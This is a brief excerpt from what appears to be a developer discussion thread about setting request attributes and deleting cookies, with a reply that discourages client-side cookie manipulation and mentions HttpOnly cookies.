Saying that, I have code which does set request attributes (code I wrote before I read that page), and it appears to work fine (apart from deleting cookies, which I mentioned in my comment above).
Manipulating cookies on the client side is rather the opposite of "best practice". And it shouldn't be necessary, either. HttpOnly cookies weren't introduced for nothing.